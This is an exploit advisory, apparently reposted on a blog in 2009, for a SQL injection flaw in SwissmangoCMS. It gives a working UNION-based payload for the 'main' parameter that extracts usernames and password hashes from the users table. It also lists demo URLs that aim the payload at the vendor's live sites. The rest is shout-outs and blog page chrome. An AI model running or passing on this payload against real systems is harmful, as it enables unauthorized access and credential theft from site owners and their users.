SwissmangoCMS SQL injection vulnerability

#####################################################
## Author : kaMtiEz (kamzcrew@gmail.com)           ##
## Homepage : http://www.indonesiancoder.com       ##
## Date : September 24, 2009                       ##
#####################################################

[ Software Information ]

[+] Vendor : http://dev.swissmango.com/
[+] Download : http://dev.swissmango.com/
[+] version : -
[+] Vulnerability : SQL injection
[+] Dork : -
[+] Location : INDONESIA

#####################################################

[ Vulnerable File ]

http://127.0.0.1/index.php?main=[INDONESIANCODER]

[ Exploit ]

666+and+1=2+union+select+concat_ws(0x3a,userName,userPass)+from+users–

[ Demo ]

http://dev.swissmango.com/index.php?main=666+and+1=2+union+select+concat_ws(0x3a,userName,userPass)+from+users–

http://cms.swissmango.com/demos/business/index.php?main=666+and+1=2+union+select+concat_ws(0x3a,userName,userPass)+from+users–

[NB] : u can see in the login and password hash in error mode ;P

#####################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy and YOU!!

[ NOTE ]

[+] makasih buad babe and enyak …. muach ..
[+] makasih buat om tukulesto dan arianom yg menemani saia selalu dan enggak bosen ma gue .. hahaha
[+] aurakasih cintailah akuw … :p

Leave a comment | Trackback
Sep 25th, 2009 | Posted in Exploitasi | Share | Tweet |
No comments yet.

Leave a comment

XHTML: You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong> <pre lang="" line="" escaped="">
RSS for comments on this post